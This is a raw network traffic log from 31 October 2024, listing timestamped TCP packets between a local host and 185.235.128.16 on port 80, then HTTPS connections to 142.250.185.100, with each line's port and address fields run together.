                                                                                                                                            Oct 31, 2024 17:12:06.884047031 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.884048939 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:06.884071112 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:06.884090900 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:06.884810925 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.884823084 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.884831905 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.884843111 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.884854078 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.884864092 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.884865999 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:06.884876013 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.884876966 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:06.884886026 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.884895086 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:06.884897947 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.884917021 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:06.884934902 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:06.885752916 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.885766029 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.885776997 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.885788918 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.885799885 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.885803938 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:06.885812044 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.885822058 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:06.885822058 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.885834932 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.885845900 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.885857105 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:06.885857105 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:06.885885954 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:06.886656046 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.886670113 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.886679888 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.886693954 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.886704922 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.886708975 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:06.886718988 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.886725903 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:06.886735916 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.886748075 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:06.886749029 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.886770010 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:06.886796951 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:06.887593985 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.887607098 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.887619019 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.887630939 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.887641907 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.887648106 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:06.887655020 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.887666941 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:06.887666941 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.887679100 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.887685061 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:06.887690067 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.887712002 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:06.887729883 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:06.888484001 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.888497114 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.888506889 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.888519049 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.888529062 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.888540030 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.888541937 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:06.888554096 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.888565063 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:06.888566017 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.888577938 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.888587952 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:06.888588905 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.888612032 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:06.888632059 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:06.889393091 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.889405012 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.889422894 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.889435053 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.889446020 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.889447927 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:06.889461040 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.889472961 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.889477968 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:06.889486074 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.889487982 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:06.889508963 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:06.889553070 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:06.890156984 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.890171051 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.890181065 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.890213966 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:06.890227079 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:06.890269995 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.890315056 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:06.892069101 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.892082930 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.892093897 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.892107010 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.892117023 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.892127991 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.892133951 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:06.892138004 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.892153978 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:06.892173052 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:06.892921925 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.892935038 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.892946005 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.892959118 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.892971039 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.892980099 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:06.893002033 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:06.893022060 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:06.893399000 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.893410921 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.893420935 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.893434048 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.893444061 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.893449068 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:06.893456936 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.893467903 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.893470049 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:06.893481970 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.893491030 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:06.893493891 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.893506050 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.893510103 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:06.893515110 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.893526077 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.893529892 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:06.893543959 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:06.893589020 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:06.894387007 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.894399881 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.894409895 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.894422054 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.894433022 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.894438028 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:06.894444942 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.894455910 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.894464016 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:06.894467115 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.894479036 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.894490004 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:06.894490957 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.894512892 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:06.894522905 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:06.895288944 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.895303011 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.895320892 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.895334005 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.895344019 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.895344973 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:06.895356894 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.895366907 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:06.895368099 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.895380020 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.895385027 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:06.895391941 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.895402908 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.895411968 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:06.895415068 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.895420074 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:06.895426035 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.895446062 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:06.895462990 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:06.896249056 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.896260977 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.896270990 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.896282911 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.896295071 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.896306992 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.896310091 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:06.896321058 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.896332979 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.896339893 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:06.896346092 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.896357059 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.896361113 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:06.896368027 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.896403074 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:06.896421909 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:06.897119999 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.897131920 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.897141933 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.897154093 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.897166014 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.897173882 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:06.897177935 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.897191048 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.897201061 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.897206068 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:06.897212982 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.897224903 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.897224903 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:06.897236109 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.897243977 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:06.897245884 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.897264004 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:06.897283077 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:06.897938013 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.897949934 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.897958994 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.897989035 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:06.898008108 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:06.898027897 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.898061991 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:06.898801088 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.898813009 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.898822069 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.898885965 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.898899078 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:06.898926973 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:06.899739981 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.899751902 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.899763107 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.899774075 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.899785042 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.899792910 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:06.900571108 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.900583029 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.900593042 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.900599003 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:06.900604010 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.900614977 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.900620937 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:06.900625944 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.900635958 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.900648117 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:06.900648117 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.900660038 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.900671005 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:06.900671005 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.900682926 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.900691032 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:06.900692940 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.900712967 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:06.900732994 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:06.901386023 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.901397943 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.901410103 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.901422024 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.901433945 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.901451111 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:06.901464939 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:06.901478052 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:06.901771069 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.901782990 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.901820898 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:06.901901007 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.901911974 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.901922941 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.901935101 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.901945114 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:06.901946068 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.901957989 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.901963949 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:06.901969910 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.901981115 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.901990891 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:06.901994944 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.902007103 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.902012110 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:06.902031898 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:06.902049065 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:06.902877092 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.902889013 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.902899027 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.902931929 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.902930975 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:06.902942896 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.902954102 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:06.902955055 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:06.902976990 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:06.902993917 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:09.594866991 CET49736443192.168.2.4142.250.185.100
                                                                                                                                            Oct 31, 2024 17:12:09.594901085 CET44349736142.250.185.100192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:09.594964027 CET49736443192.168.2.4142.250.185.100
                                                                                                                                            Oct 31, 2024 17:12:09.609206915 CET49736443192.168.2.4142.250.185.100
                                                                                                                                            Oct 31, 2024 17:12:09.609221935 CET44349736142.250.185.100192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:09.954524994 CET49737443192.168.2.4142.250.185.100
                                                                                                                                            Oct 31, 2024 17:12:09.954576969 CET44349737142.250.185.100192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:09.954746962 CET49737443192.168.2.4142.250.185.100
                                                                                                                                            Oct 31, 2024 17:12:09.955070019 CET49737443192.168.2.4142.250.185.100
                                                                                                                                            Oct 31, 2024 17:12:09.955082893 CET44349737142.250.185.100192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:09.955483913 CET49738443192.168.2.4142.250.185.100
                                                                                                                                            Oct 31, 2024 17:12:09.955518961 CET44349738142.250.185.100192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:09.955569029 CET49738443192.168.2.4142.250.185.100
                                                                                                                                            Oct 31, 2024 17:12:09.955811024 CET49738443192.168.2.4142.250.185.100
                                                                                                                                            Oct 31, 2024 17:12:09.955823898 CET44349738142.250.185.100192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:10.068362951 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:10.068434000 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:10.080221891 CET49739443192.168.2.4142.250.185.100
                                                                                                                                            Oct 31, 2024 17:12:10.080250978 CET44349739142.250.185.100192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:10.080971956 CET49739443192.168.2.4142.250.185.100
                                                                                                                                            Oct 31, 2024 17:12:10.081238031 CET49739443192.168.2.4142.250.185.100
                                                                                                                                            Oct 31, 2024 17:12:10.081258059 CET44349739142.250.185.100192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:10.475573063 CET44349736142.250.185.100192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:10.475831032 CET49736443192.168.2.4142.250.185.100
                                                                                                                                            Oct 31, 2024 17:12:10.475851059 CET44349736142.250.185.100192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:10.477281094 CET44349736142.250.185.100192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:10.477349043 CET49736443192.168.2.4142.250.185.100
                                                                                                                                            Oct 31, 2024 17:12:10.478485107 CET49736443192.168.2.4142.250.185.100
                                                                                                                                            Oct 31, 2024 17:12:10.478562117 CET44349736142.250.185.100192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:10.478643894 CET49736443192.168.2.4142.250.185.100
                                                                                                                                            Oct 31, 2024 17:12:10.478651047 CET44349736142.250.185.100192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:10.520019054 CET49736443192.168.2.4142.250.185.100
